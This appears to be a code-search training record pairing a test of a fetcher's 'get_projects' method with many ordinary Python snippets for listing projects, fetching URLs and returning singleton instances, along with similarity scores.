self._nextify(components, picker, params)\n\n return Result(r, picker, _next)", "def _fetch_resource(self):\n\n qs = self._build_qs() # Build the query string\n url = self._build_url(qs) # Build the full url\n fp = self._api_call(url) # Fetch the data as a file pointer\n\n # Parse the list of dicts in to a dict generator\n return csv.DictReader(fp)", "def get_object(self):\n queryset = self.filter_queryset(self.get_queryset())\n\n # Perform the lookup filtering.\n lookup_url_kwarg = self.lookup_url_kwarg or self.lookup_field\n\n assert lookup_url_kwarg in self.kwargs, (\n 'Expected view %s to be called with a URL keyword argument '\n 'named \"%s\". Fix your URL conf, or set the `.lookup_field` '\n 'attribute on the view correctly.' %\n (self.__class__.__name__, lookup_url_kwarg)\n )\n\n filter_kwargs = {self.lookup_field: self.kwargs[lookup_url_kwarg]}\n obj = get_object_or_404(queryset, **filter_kwargs)\n\n # May raise a permission denied\n self.check_object_permissions(self.request, obj)\n\n return obj", "def me(self):\n\n return self.client._get(self._url())", "def get_soup_obj(url):\n try:\n html = session.get(url, headers=headers).text\n return BeautifulSoup(html, \"html.parser\")\n except HTTPError:\n print(\"{} not reachable\".format(url))\n return None", "def fetch(self, url, body=None, headers=None):\r\n if body:\r\n # method = 'POST'\r\n # undo the URL encoding of the POST arguments\r\n data = parse_qs(body)\r\n response = self.client.post(url, data)\r\n else:\r\n # method = 'GET'\r\n data = {}\r\n if headers and 'Accept' in headers:\r\n data['CONTENT_TYPE'] = headers['Accept']\r\n response = self.client.get(url, data)\r\n\r\n # Translate the test client response to the fetcher's HTTP response abstraction\r\n content = response.content\r\n final_url = url\r\n response_headers = {}\r\n if 'Content-Type' in response:\r\n response_headers['content-type'] = response['Content-Type']\r\n if 'X-XRDS-Location' in response:\r\n response_headers['x-xrds-location'] = response['X-XRDS-Location']\r\n status = response.status_code\r\n\r\n return HTTPResponse(\r\n body=content,\r\n final_url=final_url,\r\n headers=response_headers,\r\n status=status,\r\n )", "def getInstance(klass):\n klass.locker.acquire()\n try:\n if not klass.instance:\n klass.instance = klass()\n return klass.instance\n finally:\n klass.locker.release()", "def fetch(self):\n raise NotImplementedError()", "def get(cls):\n return cls.instance", "def get(self):\n request = urllib.request.Request(self.url)\n if self.proxy:\n request.set_proxy(self.proxy, 'http')\n logger.info(\"Attempt to do GET request: url=%s, proxy=%s\",\n self.url, self.proxy)\n response = urllib.request.urlopen(request)\n logger.info(\"GET request was successful: url=%s, proxy=%s\",\n self.url, self.proxy)\n return response", "def getInstance():\n return net()", "def get_instance(cls):\n global FW_MANAGER_API\n if not FW_MANAGER_API:\n FW_MANAGER_API = cls()\n return FW_MANAGER_API", "def load_to_scraper(self, scraper):\n scraper.url = self.url\n scraper.response = self.response\n scraper.load_soup()\n return scraper", "def fetch_and_load(this_class, model_name, models_directory=None,\n verbose=False, extra_loading_options=None):\n from .ModelFetcher import download_and_install_model\n model_dir = download_and_install_model(model_name,\n models_directory,\n verbose)\n\n kwargs = extra_loading_options or {}\n return this_class.from_unified_model_dir(model_dir, **kwargs)", "def fetchContent(self):\n print 'fetching page by its path: '+ self.path\n uri = '%s?path=%s' % (self.client.MakeContentFeedUri(), self.path)\n # get the content feed\n feed = self.client.GetContentFeed(uri=uri)\n # take out the content\n self.entry = feed.get_webpages()[0]", "def GetInstance():\n pass", "def get_instance(cls):\n global DNS_MANAGER_API\n if not DNS_MANAGER_API:\n DNS_MANAGER_API = cls()\n return DNS_MANAGER_API", "def return_beautiful_soup_object(url: str) -> bs4.BeautifulSoup:\n html_filename, headers = urllib.request.urlretrieve(url)\n with open(html_filename) as file:\n soup = BeautifulSoup(file, 'html.parser')\n file.close()\n return soup", "def retrieve(self):\n return self._wrapper(self._retrieve)", "def _get_instance(cls, configuration, auth_type):\n if configuration in cls._INSTANCES:\n return cls._INSTANCES[configuration]\n return cls._create_instance(configuration, auth_type)", "def from_crawler(cls, crawler):\n\n return cls(crawler.settings.get('ITEM_DATA_STORE'))", "def fetch(self):\n pass", "def fetch(self):\n pass", "def fetch(self) -> None:\n pass", "def get(self):\r\n return http.Request('GET', self.get_url()), parsers.parse_json", "def get(self):\r\n return http.Request('GET', self.get_url()), parsers.parse_json", "def _get_cached_instance(self):\n\n try:\n identifier = self._get_identifier()\n except (ValueError, ObjectDoesNotExist) as error:\n if self._fail_silently:\n return None\n raise LazyModelObjectError(exc=error) from error\n\n # Get the cache key, basically just namespacing the identifier\n cache_key = model_cache_key(identifier)\n\n cache, timeout = self._cache\n cace: BaseCache\n if cache_key in cache:\n instance = cache.get(cache_key)\n else:\n instance = self._get_instance(identifier)\n cache.set(cache_key, instance, timeout=timeout)\n\n if instance is None and not self._fail_silently:\n raise LazyModelObjectError(f'{identifier} not found.')\n return instance", "def __get(self, url, headers=None):\n return self.__req(url, \"GET\", headers=headers)", "async def fetch_page(self, url: str) -> PageRaw:\n\n raise NotImplementedError()", "def createClientFromUrl(url, authStrategy=None):\n return MetaClient(MetaHttpClient(url, authStrategy))", "def from_url(cls, url):\n query_params = _get_query_params_from_url(url)\n\n if _get_param(query_params, \"SERVICE\") == \"WMS\":\n layer = _get_param(query_params, \"LAYERS\")\n elif _get_param(query_params, \"SERVICE\") == \"WCS\":\n layer = _get_param(query_params, \"COVERAGE\")\n\n d = None\n if layer.startswith(\"https://\"):\n d = _get_from_url(layer).json()\n elif layer.startswith(\"s3://\"):\n parts = layer.split(\"/\")\n bucket = parts[2]\n key = \"/\".join(parts[3:])\n s3 = S3CacheStore(s3_bucket=bucket)\n s = s3._load(key)\n elif layer == \"%PARAMS%\":\n s = _get_param(query_params, \"PARAMS\")\n else:\n p = _get_param(query_params, \"PARAMS\")\n if p is None:\n p = \"{}\"\n if not isinstance(p, dict):\n p = json.loads(p)\n return cls.from_name_params(layer, p)\n\n if d is None:\n d = json.loads(s, object_pairs_hook=OrderedDict)\n\n return cls.from_definition(d)", "def from_url(cls, url):\n query_params = _get_query_params_from_url(url)\n\n if _get_param(query_params, \"SERVICE\") == \"WMS\":\n layer = _get_param(query_params, \"LAYERS\")\n elif _get_param(query_params, \"SERVICE\") == \"WCS\":\n layer = _get_param(query_params, \"COVERAGE\")\n\n d = None\n if layer.startswith(\"https://\"):\n d = _get_from_url(layer).json()\n elif layer.startswith(\"s3://\"):\n parts = layer.split(\"/\")\n bucket = parts[2]\n key = \"/\".join(parts[3:])\n s3 = S3CacheStore(s3_bucket=bucket)\n s = s3._load(key)\n elif layer == \"%PARAMS%\":\n s = _get_param(query_params, \"PARAMS\")\n else:\n p = _get_param(query_params, \"PARAMS\")\n if p is None:\n p = \"{}\"\n if not isinstance(p, dict):\n p = json.loads(p)\n return cls.from_name_params(layer, p)\n\n if d is None:\n d = json.loads(s, object_pairs_hook=OrderedDict)\n\n return cls.from_definition(d)", "def get_handler(cls):\n if cls.__instance is None:\n cls.__instance = AliceBlueApi()\n return cls.__instance", "def urlfetch(self, url, **kwargs):\n logging.debug('Fetching %s with kwargs %s', url, kwargs)\n resp = urlfetch.fetch(url, deadline=999, **kwargs)\n\n if resp.status_code == 200:\n return resp.content\n else:\n logging.warning('GET %s returned %d:\\n%s',\n url, resp.status_code, resp.content)\n self.handler.response.headers.update(resp.headers)\n self.handler.response.out.write(resp.content)\n raise exc.status_map.get(resp.status_code)(resp.content)", "def feed(self):\r\n return feed.Feed(self)", "def feed(self):\n return feed.Feed(self)", "def get_instance():\n if NrsGlobalCache._instance is None:\n NrsGlobalCache()\n return NrsGlobalCache._instance", "def _cache(self):\n return self._class(self.client_servers, **self._options)", "def get(cls, uri):\n return cls._perform_request(uri, 'GET')", "def get_worker(self):\n worker = self.worker(job_id=self.job_id, spider=self.spider,\n http_session={'url': self.url, 'timeout': self.timeout},\n **self.kwargs)\n return worker", "def load(cls, host):\n\n return cls(host)", "def instance(cls):\n if cls._instance is None:\n cls._instance = cls()\n return cls._instance", "def _urlfetch(**kwargs):\n return ndb.get_context().urlfetch(**kwargs)" ]
[ "0.7616966", "0.64553005", "0.6100894", "0.6082667", "0.59977883", "0.5952911", "0.58968616", "0.58818334", "0.5799498", "0.5791189", "0.5787772", "0.57814115", "0.57779944", "0.577231", "0.57723045", "0.5654948", "0.56429166", "0.56370324", "0.56276923", "0.56252486", "0.5616734", "0.5604621", "0.558886", "0.5573998", "0.5554595", "0.5554217", "0.55488104", "0.5500979", "0.54956883", "0.54956883", "0.5494509", "0.54927844", "0.54927844", "0.54927844", "0.5482204", "0.54778117", "0.5476008", "0.5460109", "0.5421826", "0.5405134", "0.53994626", "0.5371193", "0.5358972", "0.5351141", "0.534241", "0.5335163", "0.53332824", "0.5326274", "0.5319263", "0.53168356", "0.53160816", "0.53146845", "0.53129566", "0.53111976", "0.5310447", "0.53045255", "0.52767104", "0.52746314", "0.5270871", "0.52665585", "0.52654934", "0.52600366", "0.5253245", "0.5244662", "0.5237839", "0.5237668", "0.52320045", "0.5221066", "0.52208376", "0.52158904", "0.5215831", "0.52095515", "0.5207857", "0.5200362", "0.51949775", "0.5194516", "0.5190189", "0.51885635", "0.518162", "0.518162", "0.5177982", "0.5177188", "0.5177188", "0.51757616", "0.51667875", "0.5162909", "0.51546913", "0.5147136", "0.5147136", "0.5146348", "0.5143989", "0.5136106", "0.5132702", "0.5127655", "0.5119212", "0.51177186", "0.5112521", "0.5111812", "0.5111797", "0.50988054" ]
0.6439661
2
fetcher.get_projects() should return a list of projects.
def test_get_projects_returns_projects(fc: fetcher.Fetcher): projects = fc.get_projects() assert isinstance(projects, list) assert isinstance(projects[0], models.Project)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def get_projects(self):\n projects = []\n page = 1\n while not len(projects) % 100:\n projects += self._get('/projects?{0}'.format(urllib.urlencode({'per_page': 100, 'page': page})))\n if not projects:\n break\n page += 1\n return projects", "def get_projects(self):\n return self.http_call(\"get\", url=f\"{self.base_url}/projects\").json()", "def get_projects(self):\n response = self.request(verb=requests.get, address=\"projects\")\n # FIXME: if no results, must we raise an exception?\n return response[\"results\"] if \"results\" in response else response", "def get_projects(self, _is_simple=False):\n req_url = f\"{self.url}/projects\"\n if _is_simple:\n req_url += \"?simple=true\"\n ret = requests.get(req_url, headers = self.req_header)\n return ret.json()", "def test_projects_get(self):\n response = self.client.open('/project-tracker/projects',\n method='GET')\n self.assert200(response, \"Response body is : \" + response.data.decode('utf-8'))", "def get_projects(self):\n res = self.conn.cursor().execute(\"SELECT * FROM projects\")\n return res.fetchall()", "def test_get_project_list_with_projects(self):\n # Add two test projects.\n projects = [\n add_project(title='1', description='1'),\n add_project(title='2', description='2'),\n ]\n\n result = get_project_list()\n result_projects = result['projects'].object_list\n\n # Make sure two test projects are retrieved.\n for project in projects:\n self.assertTrue(project in result_projects)\n self.assertEqual(len(result_projects), len(projects))\n self.assertIsNone(result['tag'])\n self.assertFalse(result['filtered'])", "def project_list(self):\n try:\n ids = self.request[api.DATA][api.DATA][\"ids\"]\n return self._get_keystone_projects(ids)\n except Exception as e:\n LOG.exception(\"Error occurred: %s\" % e)", "def list_projects(self):\n data = self._run(\n url_path=\"projects/list\"\n )\n projects = data['result'].get('projects', [])\n return [self._project_formatter(item) for item in projects]", "def projects():\n response = jsonify(projects_service.get_top_level_projects_ids())\n return response", "def _get_projects(project_ids):\n if _ALL in project_ids:\n return projects_lib.get_all()\n return projects_lib.get_selective(project_ids)", "def test_get_projects_filters(fc: fetcher.Fetcher, test_project_name):\n projects = fc.get_projects(test_project_name)\n assert isinstance(projects, list)\n assert len(projects) == 1\n assert projects[0].name == test_project_name", "def list_projects():\n\n cmd = dict()\n cmd[\"type_\"] = \"list_projects\"\n cmd[\"name_\"] = \"\"\n \n s = comm.send_and_receive_socket(cmd)\n\n msg = comm.recv_string(s)\n\n if msg != \"Success!\":\n raise Exception(msg)\n \n json_str = comm.recv_string(s) \n \n s.close() \n\n return json.loads(json_str)[\"projects\"]", "def test_get_projects(self):\n pass", "def list_projects(arn=None, nextToken=None):\n pass", "def get_projects(self, *criterion):\n from wkcdd.models.helpers import get_project_list\n return get_project_list([self.id], *criterion)", "def getprojects(self):\n resp = self.conn.request('GET', self.URLS['allprojects'], dict(api_key=self.api_key))\n data = resp.data.decode('utf-8')\n jdata = json.loads(data)['projects']\n # Convert nested JSON documents\n for project_index in range(len(jdata)):\n for field in ('options_json', 'templates_json'):\n jdata[project_index][field] = json.loads(jdata[project_index][field])\n # Pass project details dictionaries to constructors, return array\n return [PhProject(self, project) for project in jdata]", "def get_projects(self):\n return conf.projects", "def projects(self):\n ret_val = []\n params = {\"fields\": Project.FIELDS}\n projects = self._request(\"get\", \"projects\", params=params)\n\n for project in projects:\n ret_val.append(Project(project))\n\n return ret_val", "def get_projects():\n return Project.query.all()", "def list_projects(ctx):\n pprint(ctx.obj.groups.get().data)", "def get_projects(self):\n return self._gitlab.owned_projects(per_page=1000)", "def get_projects(self):\n return self.jira.projects()", "def get_all_projects(self, scope):\n url = \"{0}/{1}/{2}\".format(self.keystone_server_url, DEFAULT_KEYSTONE_API_VERSION, \"projects\")\n headers = {'X-Auth-Token': scope.auth_token}\n try:\n r = self._make_request_with_auth_fallback(url, headers)\n return r['projects']\n\n except Exception as e:\n self.warning('Unable to get projects: %s', e)\n raise e\n\n return None", "def get_project_list():\n return parse_list_output(Popen(\n 'openstack project list'.split(), stdout=STDOUT, stderr=STDERR\n ).communicate()[0])", "def get_projects(self):\n ret = self.v1_projects.get()\n return [each.metadata.name for each in ret.items]", "def getProjects(self):\n catalog = plone.api.portal.get_tool('portal_catalog')\n path = '{}/projects'.format('/'.join(plone.api.portal.get().getPhysicalPath()))\n query = dict(portal_type='Project', sort_on='sortable_title', path=path)\n result = list()\n for brain in catalog(**query):\n result.append((brain.getId, brain.Title))\n return result", "def list_keystone_v3_projects(self):\n LOG_OBJ.debug(\"List the projects.\")\n\n _url = \"http://\" + self.host_ip + \":35357/v3/projects\"\n _headers = {'x-auth-token': self.cloud_admin_info[\"token_domain\"],\n 'content-type': 'application/json'}\n _body = None\n\n response = self.request(\"GET\", _url, _headers, _body)\n\n if response is None:\n LOG_OBJ.error(\"No response from Server while creating project\")\n print (\"No response from Server while creating project\")\n return response\n\n if response.status not in [200, 201, 202, 203, 204]:\n LOG_OBJ.error(\" Creating project Failed with status %s \"\n \"and error : %s\" % (response.status, response.data))\n print (\" Creating project Failed with status %s and error : %s\" %\n (response.status, response.data))\n return response.status\n\n output = json.loads(response.data)\n LOG_OBJ.info(\"Projects list : %s \" % output)\n print (\"Projects list : %s \" % output)\n return output['projects']", "def projects(args):\n _projects = lib.get_projects(\n args.target, username=args.username, password=args.password\n )\n if _projects:\n print(\"\\n\".join(_projects))", "def all(cls):\n projects_url = 'https://www.pivotaltracker.com/services/v5/projects'\n root = _perform_pivotal_get(projects_url)\n if root is not None:\n return [Project.from_json(project_node) for project_node in root]", "def get_project_list(self, dummy_project):\n # TODO: domain scope 403 is probably to do with faulty keystone policy config -- revise?\n if not self._projects:\n self._projects = self._get_keystone_client(dummy_project).projects.list()\n\n return self._projects", "def get_projects():\n if current_user.get_id() is None:\n return\n with database.engine.begin() as connection:\n result = connection.execute(select(\n [models.projects.c.project_id, models.projects.c.name, models.projects.c.path, models.projects.c.creation_date, models.projects.c.user_id, func.count(models.objects.c.object_id).label('object_count')])\n .select_from(models.projects.outerjoin(models.objects))\n .where(and_(models.projects.c.active == True, models.projects.c.user_id == current_user.id))\n .group_by(models.projects.c.project_id)\n .order_by(models.projects.c.project_id))\n projects = [dict(row) for row in result]\n for project in projects:\n user = models.User.query.filter_by(\n id=project['user_id']).first()\n if user:\n project['email'] = user.email\n return projects", "def get_projects(cls):\n projects = []\n for project in Project.select():\n project_dict = {\n \"id\": project.id,\n \"title\": project.title,\n \"link\": project.link,\n \"description\": project.description\n }\n projects.append(project_dict)\n return projects", "def test_list_projects(self):\n pass", "def test_list_projects(self):\n pass", "def all(cls):\r\n projects_url = 'https://www.pivotaltracker.com/services/v3/projects'\r\n response = _perform_pivotal_get(projects_url)\r\n\r\n root = ET.fromstring(response.text)\r\n if root is not None:\r\n return [Project.from_node(project_node) for project_node in root]", "def get_projects(self, team_id):\n endpoint = '/teams/{}/projects'.format(team_id)\n return self._api_call('get', endpoint)", "def get_projects(self):\n projects = []\n for project in self.server.projects:\n projects.append({'id': utils.slugify(project),\n 'name': project})\n response.content_type = 'application/json'\n return json.dumps(projects)", "def projects(self):\r\n return p.Projects(self)", "def list_projects():\n with BMI(_username, _password, constants.BMI_ADMIN_PROJECT) as bmi:\n ret = bmi.list_projects()\n if ret[constants.STATUS_CODE_KEY] == 200:\n table = PrettyTable(\n field_names=[\"Id\", \"Name\", \"Provision Network\"])\n projects = ret[constants.RETURN_VALUE_KEY]\n for project in projects:\n table.add_row(project)\n click.echo(table.get_string())\n else:\n click.echo(ret[constants.MESSAGE_KEY])", "def get_project_list(token):\n session = requests.Session()\n session.headers.update({'Authorization': f'Token {token}'})\n url = get_project_list_url()\n r = session.get(url=url)\n return r", "def test_get_projects(client, session, models, tokens):\n response = client.get(\n \"/projects\", headers={\"Authorization\": f\"Bearer {tokens['read']}\"}\n )\n assert response.status_code == 200\n assert len(response.json) > 0", "def do_project_list(cs, args):\n _, projects = cs.projects.list()\n fields = [\n 'project_id',\n 'name',\n 'owner_id',\n 'current_user_role_id',\n 'repo_count',\n 'creation_time',\n 'public',\n ]\n utils.print_list(projects, fields, formatters={}, sortby=args.sortby)", "def getProjects(self):\n\n return self.__projects", "def get_projects(self):\n session = self.session_factory()\n results = [row.project for row in session.query(PipelineRun.project.distinct().label('project')).all()]\n session.close()\n return results", "def projects(self, request, pk=None):\n\n obj = self.get_object()\n try:\n query = models.Project.objects.filter(\n subject=obj.subject,\n assign=obj\n )\n serializer = self.get_serializer(query, many=True)\n\n id = self.request.query_params.get('id')\n\n if id:\n query = get_object_or_404(\n models.Project,\n id=id,\n assign=obj\n )\n return self.filtering(request, query)\n\n return Response(serializer.data)\n except:\n raise except_handler.ActionDecor()", "def get_projects(self):\n if not self.validate():\n raise SettingCustomVisionAccessFailed\n return self.get_trainer_obj().get_projects()", "def test_list_project_request(self):\n pass", "def get_projects_data():\n wcscanner_path = context.__BASE_PATH__ + '/.wcscanner'\n\n data = []\n for project in os.listdir(wcscanner_path):\n if (os.path.isdir(os.path.join(wcscanner_path, project))):\n update_project_data(project)\n project_path = '{}/{}'.format(wcscanner_path, project)\n f = open('{}/.project'.format(project_path), 'r')\n data.append(json.load(f))\n f.close()\n return data", "def list_projects():\n if '.wcscanner' not in os.listdir(context.__BASE_PATH__):\n return []\n return os.listdir(context.__PROJECTS_PATH__)", "def get_projects(self, page_size, page, sort_direction, sort_conditions):\n request_url = self.api_base_url + \"projects?\" + \"pageSize=\" + str(page_size) + \"&page=\" + str(page) + \"&sortDirection=\" + sort_direction + \"&sortConditions=\" + sort_conditions\n headers = {\"Accept\": \"application/JSON\"}\n response = Util.get_api_call(request_url, headers)\n return response.json()", "def project_list(cursor):\n query = \"SELECT * FROM projects\"\n try:\n cursor.execute(query, {},)\n except Exception as e:\n on_error(e)\n else:\n projects = cursor.fetchall()\n raise Return((projects, None))", "def get_projects(selection):\n project=[]\n\n # project with keyname\n\n if 'project' in selection.facets:\n project+=selection.facets['project']\n\n\n # project without keyname\n\n # WARNING\n #\n # The code below uses sdinference and query the database to retrieve ESGF parameters.\n # Doing those things here may raise circular dependencies\n # as well as making the whole thing very complex.\n #\n # We do this to make this syntax work (i.e. project value without key)\n # synda search GeoMIP\n #\n # Note that this syntax always works (i.e. load the project level default file), even without this code.\n # synda search project=GeoMIP\n #\n #\n pending_projects=sdearlystreamutils.get_facet_values_early([selection.facets],'project',extract_item=True) # project without keyname or project as part of an identifier.\n\n li=pending_projects+project\n\n li=list(set(li)) # remove duplicate\n\n return li", "def get(self):\n try:\n user = None\n user_id = token_auth.current_user()\n if user_id:\n user = UserService.get_user_by_id(user_id)\n search_dto = self.setup_search_dto()\n results_dto = ProjectSearchService.search_projects(search_dto, user)\n return results_dto.to_primitive(), 200\n except NotFound:\n return {\"mapResults\": {}, \"results\": []}, 200\n except (KeyError, ValueError) as e:\n error_msg = f\"Projects GET - {str(e)}\"\n return {\"Error\": error_msg}, 400", "def get_projects():\n data = sql.list_projects()\n names = [(d['id'], d['name']) for d in data]\n return names", "def test_get_projects(self):\n for project in ['TEST', 'NEWTEST', 'MYPROJECT']:\n self.db.insert_single_result(generate_mock_result(project=project))\n projects = self.db.get_projects()\n self.assertItemsEqual(['MYPROJECT', 'NEWTEST', 'TEST'], projects)", "def db_projects():\n return [{\"name\": \"IT\"}, {\"name\": \"Financial\"}, {\"name\": \"Failed\"}]", "def get_all_projects():\n return jsonify(admin.get_all_projects(current_app.scoped_session()))", "def get_projects(self, refresh=False):\n if refresh:\n self._projects_lookup = self.get_project_lookup()\n\n return self._projects_lookup.keys()", "def GetProject(self):\n errors = []\n objects = list(request_helper.MakeRequests(\n requests=[(self.compute.projects,\n 'Get',\n self.messages.ComputeProjectsGetRequest(\n project=properties.VALUES.core.project.Get(\n required=True),\n ))],\n http=self.http,\n batch_url=self.batch_url,\n errors=errors,\n custom_get_requests=None))\n if errors:\n utils.RaiseToolException(\n errors,\n error_message='Could not fetch project resource:')\n return objects[0]", "def get_projects(self):\n unaligned_path = self.get_unaligned_path()\n logger.debug(\"collecting list of projects\")\n return [p for p in os.listdir(unaligned_path)\n if len(parsing.get_project_label(p))]", "def _get_projects(current_project_name):\n projects = []\n\n unique_project_changes = Change.objects.order_by().values(\n 'project_name').distinct()\n for change in unique_project_changes:\n projects.append(change['project_name'])\n\n # sort alphabetically\n projects.sort()\n\n # insert 'all' option as it should be present always\n projects.insert(0, PROJECT_ALL)\n\n # if current_project_name is valid, make it the first element in list so\n # that it shows up as selected in project choice drop down\n if current_project_name != PROJECT_ALL and current_project_name in projects:\n projects.remove(current_project_name)\n projects.insert(0, current_project_name)\n elif current_project_name != PROJECT_ALL:\n logging.error(\"Currently selected project %s not found in any changes.\"\n \" Removing from list.\", current_project_name)\n logging.debug(\"Returning list of projects: %r\", projects)\n return projects", "def projects(request):\n projects = (\n Project.objects.visible()\n .visible_for(request.user)\n .prefetch_related(\"latest_translation__user\")\n .order_by(\"name\")\n )\n\n if not projects:\n return render(request, \"no_projects.html\", {\"title\": \"Projects\"})\n\n return render(\n request,\n \"projects/projects.html\",\n {\"projects\": projects, \"top_instances\": projects.get_top_instances()},\n )", "def get_projects(self, source=\"all\"):\n self.projects = []\n self._project_indices_by_id = {}\n self._project_indices_by_name = {}\n\n if self.hub_type == self.NAMESPACES[\"a.\"]:\n if not self.auth.three_legged:\n self.logger.warning(\n \"Failed to get projects. '{}' hubs only supports 3-legged access token.\".format( # noqa:E501\n self.NAMESPACES[\"a.\"]\n )\n )\n else:\n for project in self.api.dm.get_projects():\n self.projects.append(\n Project(\n project[\"attributes\"][\"name\"],\n project[\"id\"][2:],\n data=project,\n app=self,\n )\n )\n\n self._project_indices_by_id[project[\"id\"][2:]] = (\n len(self.projects) - 1\n )\n self._project_indices_by_name[\n project[\"attributes\"][\"name\"]\n ] = (len(self.projects) - 1)\n\n elif self.hub_type == self.NAMESPACES[\"b.\"]:\n\n if source.lower() in (\"all\", \"docs\"):\n for project in self.api.dm.get_projects():\n self.projects.append(\n Project(\n project[\"attributes\"][\"name\"],\n project[\"id\"][2:],\n data=project,\n app=self,\n )\n )\n\n self._project_indices_by_id[project[\"id\"][2:]] = (\n len(self.projects) - 1\n )\n self._project_indices_by_name[\n project[\"attributes\"][\"name\"]\n ] = (len(self.projects) - 1)\n\n if (\n source.lower() in (\"all\", \"admin\")\n and not self.auth.three_legged\n ):\n\n for project in self.api.hq.get_projects():\n if project[\"id\"] in self._project_indices_by_id:\n self.projects[\n self._project_indices_by_id[project[\"id\"]]\n ].data = project\n else:\n self.projects.append(\n Project(\n project[\"name\"],\n project[\"id\"],\n data=project,\n app=self,\n )\n )\n self._project_indices_by_id[project[\"id\"]] = (\n len(self.projects) - 1\n )\n\n self._project_indices_by_name[project[\"name\"]] = (\n len(self.projects) - 1\n )\n\n elif source.lower() in (\"all\", \"admin\"):\n self.logger.debug(\n \"Failed to get projects. The BIM 360 API only supports 2-legged access tokens\" # noqa:E501\n )", "def get_all_projects(self, org):\n return [proj for proj in Project.objects.filter(org=org)]", "def list_projects(self) -> List['RadsProject']:\n ret = []\n base = self.fspath(\"projects\")\n for name in os.listdir(base):\n if os.path.isdir(f\"{base}/{name}/releases\"):\n ret.append(RadsProject(self, name))\n return ret", "def get_projects(session):\n cursuses = [1, 21] # cursus ids from which to get the projects\n project_names = []\n\n for cursus in cursuses:\n # Get all the projects from 1 cursus, very slow process because projects endpoint contains\n # a lot of information\n projects = get_all_pages(session, f'/cursus/{cursus}/projects', 100, {'filter[exam]': False})\n for project in projects:\n # Create dictionary containing project id and project name ans set in bigger dict\n project_names.append({'id': project['id'], 'name': project['name']})\n\n return project_names", "def repository_projects(self, host: (str), owner: (str), repo: (str)) -> Any:\n\n return search_api(\"repository_projects\", host, owner, repo)", "def test_list_project(self):\n pass", "def _get_resource_projects(resource):\n resource_type = resource.get('type', '').upper()\n resource_values = resource.get('include', tuple())\n\n projects = tuple()\n if resource_type == _FOLDER:\n projects = _get_folder_projects(resource_values)\n elif resource_type == _PROJECT:\n projects = _get_projects(resource_values)\n elif resource_type == _FILTER:\n projects = _get_filtered_projects(resource_values)\n else:\n logging.info('Projects: No projects for resource %s', resource_type)\n return projects", "def find_projects(self, project_name: Optional[str] = None) -> List[Project]:\n with self.table_access_condition:\n conn = self._get_connection()\n c = conn.cursor()\n c.execute(\n \"\"\"\n SELECT * from projects\n WHERE (?1 IS NULL OR project_name = ?1)\n \"\"\",\n (project_name,),\n )\n rows = c.fetchall()\n return [\n Project(self, str(r[\"project_id\"]), row=r, _used_new_call=True)\n for r in rows\n ]", "def _page_projects(self):\n return self._open(self.app.page_projects)", "def BuildProjectsList(self, projects):\n return ProjectsMessage(\n projects=[ProjectsMessage.Project(projectId=project)\n for project in projects]\n )", "def projects(self):\n sql = \"\"\"SELECT project\n FROM barcodes.sample\n LEFT JOIN barcodes.project_sample_sets USING (sample_set_id)\n LEFT JOIN barcodes.project USING (project_id)\n WHERE sample_id = %s\n UNION\n SELECT project\n FROM barcodes.project_samples\n LEFT JOIN barcodes.project USING (project_id)\n WHERE sample_id = %s\n \"\"\"\n with pm.sql.TRN:\n pm.sql.TRN.add(sql, [self.id, self.id])\n projects = pm.sql.TRN.execute_fetchflatten()\n return None if not projects else projects", "def test_projects_endpoint(self):\n with open('demo/tests/mock_results.json', 'r') as result_file:\n data = result_file.read()\n expected_response = json.loads(data)[\"test_project_calls\"]\n\n responses.add(\n responses.GET,\n f'{os.environ[\"AIVEN_API_URL\"]}/v1/project',\n json=expected_response,\n status=200\n )\n resp = requests.get(f'{os.environ[\"AIVEN_API_URL\"]}/v1/project')\n\n assert resp.status_code == 200\n assert resp.json() == expected_response\n assert len(responses.calls) == 1\n assert responses.calls[0].request.url == f'{os.environ[\"AIVEN_API_URL\"]}/v1/project'\n assert \"MY-PROJECT-NAME\" in responses.calls[0].response.text\n assert responses.calls[0].response.json() == expected_response", "def do_projects(self, arg):\n args = shlex.split(arg)\n limit = 10\n from_date = to_date = ''\n if args:\n limit = 0\n try:\n from_date, to_date = helpers.parse_date_parameters(args)\n except ValueError, msg:\n print(msg)\n return\n projects = self.db.get_projects_with_activity_field(\n from_date, to_date, limit=limit)\n refined = map(lambda x: [\n x['pid'], x['name'],\n '[Active]' if x['active'] else '[closed]',\n datetime.datetime.strftime(x['created'], '%c').decode('utf8'),\n x['description']], projects)\n print(tabulate(refined, ['ID', 'Project', 'Activity', 'Created',\n 'Description']))", "def selectable_projects():\n\n db = current.db\n s3db = current.s3db\n\n # Lookup projects with provider self-registration\n ptable = s3db.project_project\n ttable = s3db.project_project_tag\n join = ttable.on((ttable.project_id == ptable.id) & \\\n (ttable.tag == \"APPLY\") & \\\n (ttable.value == \"Y\") & \\\n (ttable.deleted == False))\n query = (ptable.deleted == False)\n rows = db(query).select(ptable.id,\n ptable.name,\n join = join,\n )\n projects = {row.id: row.name for row in rows}\n return projects", "def request_project_list(event_id):\n is_moar = bool(request.args.get('moar', type=bool))\n host_url = request.host_url\n return get_project_list(event_id, host_url, is_moar)", "def projects_from_cli(args):\n description = ('Determine if a set of project dependencies will work with '\n 'Python 3')\n parser = argparse.ArgumentParser(description=description)\n req_help = ('path to a pkg_resources requirements file '\n '(e.g. requirements.txt)')\n parser.add_argument('--requirements', '-r', nargs='?',\n help=req_help)\n meta_help = 'path to a PEP 426 metadata file (e.g. PKG-INFO, pydist.json)'\n parser.add_argument('--metadata', '-m', nargs='?',\n help=meta_help)\n parser.add_argument('--projects', '-p', type=lambda arg: arg.split(','),\n nargs='?', help='a comma-separated list of projects')\n parser.add_argument('--verbose', '-v', action='store_true',\n help='verbose output')\n parsed = parser.parse_args(args)\n\n projects = []\n if parsed.verbose:\n logging.getLogger().setLevel(logging.INFO)\n if parsed.requirements:\n projects.extend(projects_from_requirements(parsed.requirements))\n if parsed.metadata:\n with open(parsed.metadata) as file:\n projects.extend(projects_from_metadata(file.read()))\n if parsed.projects:\n projects.extend(parsed.projects)\n\n return projects", "def _ExpectListProjects(self, projects):\n self.mock_projects_client.projects.List.Expect(\n self.projects_messages.CloudresourcemanagerProjectsListRequest(\n filter='lifecycleState:ACTIVE'),\n self.projects_messages.ListProjectsResponse(\n projects=[\n self.projects_messages.Project(\n projectId=p, name='name') for p in projects]))", "def test_project_list_with_projects(self):\n # Add test projects.\n first_project = add_project(title='Title 1', description='Description 1')\n second_project = add_project(title='Title 2', description='Description 2')\n\n # Check that project list contains test projects.\n response = self.client.get(reverse('portfolio:project_list'))\n 